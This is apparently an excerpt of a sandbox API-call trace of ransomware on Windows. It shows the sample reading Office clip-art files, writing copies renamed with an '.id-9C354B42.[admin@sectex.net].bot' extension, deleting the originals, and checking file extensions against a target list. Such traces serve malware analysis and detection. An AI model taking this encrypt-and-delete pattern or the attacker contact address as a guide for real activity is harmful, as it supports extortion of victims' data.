	[0147.865] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00623_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh00623_.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a0
	[0147.865] GetLastError () returned 0x0
	[0147.865] ReadFile (in: hFile=0x3bc, lpBuffer=0xae50020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa2cfed4, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesRead=0xa2cfed4*=0x2994, lpOverlapped=0x0) returned 1
	[0147.998] WriteFile (in: hFile=0x3a0, lpBuffer=0xae50020*, nNumberOfBytesToWrite=0x29a0, lpNumberOfBytesWritten=0xa2cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesWritten=0xa2cfc9c*=0x29a0, lpOverlapped=0x0) returned 1
	[0148.000] ReadFile (in: hFile=0x3bc, lpBuffer=0xae50020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa2cfed4, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesRead=0xa2cfed4*=0x0, lpOverlapped=0x0) returned 1
	[0148.000] WriteFile (in: hFile=0x3a0, lpBuffer=0xae50020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa2cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesWritten=0xa2cfc9c*=0xec, lpOverlapped=0x0) returned 1
	[0148.000] SetEndOfFile (hFile=0x3a0) returned 1
	[0148.247] CloseHandle (hObject=0x3a0) returned 1
	[0148.281] SetFilePointerEx (in: hFile=0x3bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0148.281] SetEndOfFile (hFile=0x3bc) returned 1
	[0148.283] CloseHandle (hObject=0x3bc) returned 1
	[0148.284] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00623_.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0148.314] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00623_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh00623_.wmf")) returned 1
	[0148.395] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00623_.WMF") returned 63
	[0148.395] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00623_.WMF") returned 63
	[0148.395] lstrlenW (lpString=".doc") returned 4
	[0148.395] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0148.395] lstrlenW (lpString=".docx") returned 5
	[0148.395] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0148.395] lstrlenW (lpString=".pdf") returned 4
	[0148.395] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0148.395] lstrlenW (lpString=".xls") returned 4
	[0148.395] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0148.395] lstrlenW (lpString=".xlsx") returned 5
	[0148.395] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0148.395] lstrlenW (lpString=".ppt") returned 4
	[0148.395] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0148.395] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00623_.WMF") returned 63
	[0148.395] lstrlenW (lpString=".zip") returned 4
	[0148.395] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0148.395] lstrlenW (lpString=".rar") returned 4
	[0148.395] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0148.395] lstrlenW (lpString=".bz2") returned 4
	[0148.396] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0148.396] lstrlenW (lpString=".7z") returned 3
	[0148.396] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0148.396] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00623_.WMF") returned 63
	[0148.396] lstrlenW (lpString=".dbf") returned 4
	[0148.396] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0148.396] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00623_.WMF") returned 63
	[0148.396] lstrlenW (lpString=".1cd") returned 4
	[0148.396] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0148.396] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00623_.WMF") returned 63
	[0148.396] lstrlenW (lpString=".jpg") returned 4
	[0148.396] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0148.396] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00623_.WMF") returned 63
	[0148.396] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00623_.WMF") returned 63
	[0148.396] lstrlenW (lpString=".doc") returned 4
	[0148.396] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0148.396] lstrlenW (lpString=".docx") returned 5
	[0148.396] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0148.396] lstrlenW (lpString=".pdf") returned 4
	[0148.396] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0148.396] lstrlenW (lpString=".xls") returned 4
	[0148.396] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0148.396] lstrlenW (lpString=".xlsx") returned 5
	[0148.396] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0148.396] lstrlenW (lpString=".ppt") returned 4
	[0148.396] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0148.396] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00623_.WMF") returned 63
	[0148.396] lstrlenW (lpString=".zip") returned 4
	[0148.396] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0148.397] lstrlenW (lpString=".rar") returned 4
	[0148.397] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0148.397] lstrlenW (lpString=".bz2") returned 4
	[0148.397] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0148.397] lstrlenW (lpString=".7z") returned 3
	[0148.397] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0148.397] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00623_.WMF") returned 63
	[0148.397] lstrlenW (lpString=".dbf") returned 4
	[0148.397] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0148.397] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00623_.WMF") returned 63
	[0148.397] lstrlenW (lpString=".1cd") returned 4
	[0148.397] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0148.397] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00623_.WMF") returned 63
	[0148.397] lstrlenW (lpString=".jpg") returned 4
	[0148.397] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0148.397] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0148.397] lstrlenW (lpString="HH01013_.WMF") returned 12
	[0148.397] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01013_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh01013_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d0
	[0148.412] GetFileSizeEx (in: hFile=0x3d0, lpFileSize=0xa2cff1c | out: lpFileSize=0xa2cff1c*=2848) returned 1
	[0148.412] CloseHandle (hObject=0x3d0) returned 1
	[0148.412] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01013_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh01013_.wmf")) returned 0x20
	[0148.501] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01013_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh01013_.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0148.501] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01013_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh01013_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x31c
	[0148.501] SetFilePointerEx (in: hFile=0x31c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0148.502] SetFilePointerEx (in: hFile=0x31c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0148.502] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01013_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh01013_.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d0
	[0148.503] GetLastError () returned 0x0
	[0148.503] ReadFile (in: hFile=0x31c, lpBuffer=0xae50020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa2cfed4, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesRead=0xa2cfed4*=0xb20, lpOverlapped=0x0) returned 1
	[0148.507] WriteFile (in: hFile=0x3d0, lpBuffer=0xae50020*, nNumberOfBytesToWrite=0xb30, lpNumberOfBytesWritten=0xa2cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesWritten=0xa2cfc9c*=0xb30, lpOverlapped=0x0) returned 1
	[0148.508] ReadFile (in: hFile=0x31c, lpBuffer=0xae50020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa2cfed4, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesRead=0xa2cfed4*=0x0, lpOverlapped=0x0) returned 1
	[0148.508] WriteFile (in: hFile=0x3d0, lpBuffer=0xae50020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa2cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesWritten=0xa2cfc9c*=0xec, lpOverlapped=0x0) returned 1
	[0148.508] SetEndOfFile (hFile=0x3d0) returned 1
	[0148.508] CloseHandle (hObject=0x3d0) returned 1
	[0148.508] SetFilePointerEx (in: hFile=0x31c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0148.509] SetEndOfFile (hFile=0x31c) returned 1
	[0148.511] CloseHandle (hObject=0x31c) returned 1
	[0148.511] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01013_.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0148.511] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01013_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh01013_.wmf")) returned 1
	[0148.512] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01013_.WMF") returned 63
	[0148.512] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01013_.WMF") returned 63
	[0148.512] lstrlenW (lpString=".doc") returned 4
	[0148.512] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0148.512] lstrlenW (lpString=".docx") returned 5
	[0148.512] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0148.512] lstrlenW (lpString=".pdf") returned 4
	[0148.512] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0148.512] lstrlenW (lpString=".xls") returned 4
	[0148.512] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0148.512] lstrlenW (lpString=".xlsx") returned 5
	[0148.512] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0148.512] lstrlenW (lpString=".ppt") returned 4
	[0148.512] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0148.512] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01013_.WMF") returned 63
	[0148.512] lstrlenW (lpString=".zip") returned 4
	[0148.512] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0148.512] lstrlenW (lpString=".rar") returned 4
	[0148.512] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0148.512] lstrlenW (lpString=".bz2") returned 4
	[0148.512] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0148.512] lstrlenW (lpString=".7z") returned 3
	[0148.512] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0148.512] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01013_.WMF") returned 63
	[0148.512] lstrlenW (lpString=".dbf") returned 4
	[0148.512] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0148.512] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01013_.WMF") returned 63
	[0148.512] lstrlenW (lpString=".1cd") returned 4
	[0148.512] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0148.512] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01013_.WMF") returned 63
	[0148.512] lstrlenW (lpString=".jpg") returned 4
	[0148.512] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0148.513] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01013_.WMF") returned 63
	[0148.513] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01013_.WMF") returned 63
	[0148.513] lstrlenW (lpString=".doc") returned 4
	[0148.513] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0148.513] lstrlenW (lpString=".docx") returned 5
	[0148.513] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0148.513] lstrlenW (lpString=".pdf") returned 4
	[0148.513] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0148.513] lstrlenW (lpString=".xls") returned 4
	[0148.513] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0148.513] lstrlenW (lpString=".xlsx") returned 5
	[0148.513] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0148.513] lstrlenW (lpString=".ppt") returned 4
	[0148.513] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0148.513] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01013_.WMF") returned 63
	[0148.513] lstrlenW (lpString=".zip") returned 4
	[0148.513] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0148.513] lstrlenW (lpString=".rar") returned 4
	[0148.513] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0148.513] lstrlenW (lpString=".bz2") returned 4
	[0148.513] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0148.513] lstrlenW (lpString=".7z") returned 3
	[0148.513] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0148.513] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01013_.WMF") returned 63
	[0148.513] lstrlenW (lpString=".dbf") returned 4
	[0148.513] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0148.513] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01013_.WMF") returned 63
	[0148.513] lstrlenW (lpString=".1cd") returned 4
	[0148.513] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0148.514] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01013_.WMF") returned 63
	[0148.514] lstrlenW (lpString=".jpg") returned 4
	[0148.514] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0148.514] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0148.514] lstrlenW (lpString="HH01080_.WMF") returned 12
	[0148.514] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01080_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh01080_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x31c
	[0148.514] GetFileSizeEx (in: hFile=0x31c, lpFileSize=0xa2cff1c | out: lpFileSize=0xa2cff1c*=5000) returned 1
	[0148.514] CloseHandle (hObject=0x31c) returned 1
	[0148.515] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01080_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh01080_.wmf")) returned 0x20
	[0148.515] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01080_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh01080_.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0148.515] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01080_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh01080_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x31c
	[0148.515] SetFilePointerEx (in: hFile=0x31c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0148.515] SetFilePointerEx (in: hFile=0x31c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0148.515] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01080_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh01080_.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d0
	[0148.516] GetLastError () returned 0x0
	[0148.516] ReadFile (in: hFile=0x31c, lpBuffer=0xae50020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa2cfed4, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesRead=0xa2cfed4*=0x1388, lpOverlapped=0x0) returned 1
	[0148.519] WriteFile (in: hFile=0x3d0, lpBuffer=0xae50020*, nNumberOfBytesToWrite=0x1390, lpNumberOfBytesWritten=0xa2cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesWritten=0xa2cfc9c*=0x1390, lpOverlapped=0x0) returned 1
	[0148.520] ReadFile (in: hFile=0x31c, lpBuffer=0xae50020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa2cfed4, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesRead=0xa2cfed4*=0x0, lpOverlapped=0x0) returned 1
	[0148.520] WriteFile (in: hFile=0x3d0, lpBuffer=0xae50020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa2cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesWritten=0xa2cfc9c*=0xec, lpOverlapped=0x0) returned 1
	[0148.520] SetEndOfFile (hFile=0x3d0) returned 1
	[0148.520] CloseHandle (hObject=0x3d0) returned 1
	[0148.520] SetFilePointerEx (in: hFile=0x31c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0148.520] SetEndOfFile (hFile=0x31c) returned 1
	[0148.522] CloseHandle (hObject=0x31c) returned 1
	[0148.523] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01080_.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0148.523] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01080_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh01080_.wmf")) returned 1
	[0148.523] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01080_.WMF") returned 63
	[0148.523] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01080_.WMF") returned 63
	[0148.523] lstrlenW (lpString=".doc") returned 4
	[0148.523] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0148.523] lstrlenW (lpString=".docx") returned 5
	[0148.523] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0148.523] lstrlenW (lpString=".pdf") returned 4
	[0148.523] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0148.523] lstrlenW (lpString=".xls") returned 4
	[0148.524] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0148.524] lstrlenW (lpString=".xlsx") returned 5
	[0148.524] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0148.524] lstrlenW (lpString=".ppt") returned 4
	[0148.524] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0148.524] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01080_.WMF") returned 63
	[0148.524] lstrlenW (lpString=".zip") returned 4
	[0148.524] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0148.524] lstrlenW (lpString=".rar") returned 4
	[0148.524] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0148.524] lstrlenW (lpString=".bz2") returned 4
	[0148.524] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0148.524] lstrlenW (lpString=".7z") returned 3
	[0148.524] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0148.524] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01080_.WMF") returned 63
	[0148.524] lstrlenW (lpString=".dbf") returned 4
	[0148.524] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0148.524] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01080_.WMF") returned 63
	[0148.524] lstrlenW (lpString=".1cd") returned 4
	[0148.524] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0148.524] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01080_.WMF") returned 63
	[0148.524] lstrlenW (lpString=".jpg") returned 4
	[0148.524] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0148.524] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01080_.WMF") returned 63
	[0148.524] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01080_.WMF") returned 63
	[0148.524] lstrlenW (lpString=".doc") returned 4
	[0148.524] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0148.524] lstrlenW (lpString=".docx") returned 5
	[0148.524] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0148.524] lstrlenW (lpString=".pdf") returned 4
	[0148.524] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0148.525] lstrlenW (lpString=".xls") returned 4
	[0148.525] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0148.525] lstrlenW (lpString=".xlsx") returned 5
	[0148.525] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0148.525] lstrlenW (lpString=".ppt") returned 4
	[0148.525] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0148.525] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01080_.WMF") returned 63
	[0148.525] lstrlenW (lpString=".zip") returned 4
	[0148.525] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0148.525] lstrlenW (lpString=".rar") returned 4
	[0148.525] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0148.525] lstrlenW (lpString=".bz2") returned 4
	[0148.525] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0148.525] lstrlenW (lpString=".7z") returned 3
	[0148.525] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0148.525] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01080_.WMF") returned 63
	[0148.525] lstrlenW (lpString=".dbf") returned 4
	[0148.525] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0148.525] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01080_.WMF") returned 63
	[0148.525] lstrlenW (lpString=".1cd") returned 4
	[0148.525] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0148.525] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01080_.WMF") returned 63
	[0148.525] lstrlenW (lpString=".jpg") returned 4
	[0148.525] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0148.525] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0148.525] lstrlenW (lpString="HH01242_.WMF") returned 12
	[0148.526] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01242_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh01242_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d0
	[0148.527] GetFileSizeEx (in: hFile=0x3d0, lpFileSize=0xa2cff1c | out: lpFileSize=0xa2cff1c*=7340) returned 1
	[0148.527] CloseHandle (hObject=0x3d0) returned 1
	[0148.527] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01242_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh01242_.wmf")) returned 0x20
	[0148.527] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01242_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh01242_.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0148.528] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01242_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh01242_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d0
	[0148.528] SetFilePointerEx (in: hFile=0x3d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0148.528] SetFilePointerEx (in: hFile=0x3d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
